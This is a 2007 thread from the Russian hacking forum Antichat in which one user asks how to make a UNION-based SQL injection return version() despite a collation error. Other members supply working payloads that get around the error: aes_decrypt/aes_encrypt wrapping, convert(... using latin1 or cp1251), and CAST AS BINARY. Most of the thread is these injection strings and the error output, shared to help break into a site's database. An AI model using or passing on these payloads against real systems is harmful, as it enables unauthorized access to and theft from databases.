Форум АНТИЧАТ - code to sql injection, help

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - code to sql injection, help (https://forum.antichat.xyz/showthread.php?t=50065)

rubik-nerubik

28.09.2007 20:05

code to sql injection, help

выручайте, нужно прально зафигачить допустим version() в этой коде:

Код:

Error: SELECT * from company WHERE company_id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/*

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

The_HuliGun

28.09.2007 20:08

Пробуем

Код:

-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,aes_decrypt(aes_encrypt(version(),1),1),22,23,24 from company/*

rubik-nerubik

28.09.2007 20:10

ok плюс кинул

Nea7	28.09.2007 20:12

Цитата:

Сообщение от rubik-nerubik

выручайте, нужно прально зафигачить допустим version() в этой коде:

Код:

Error: SELECT * from company WHERE company_id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/*

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

aes_decrypt(aes_encrypt(version(),0x71),0x71) поздно =\

phol1eadeux

28.09.2007 20:14

либо convert(version() using latin1)

Azazel

28.09.2007 20:19

http://www.sysman.ru/index.php?showtopic=13530
+union+select+convert(user() using cp1251)
CAST(user AS BINARY).

Время: 13:10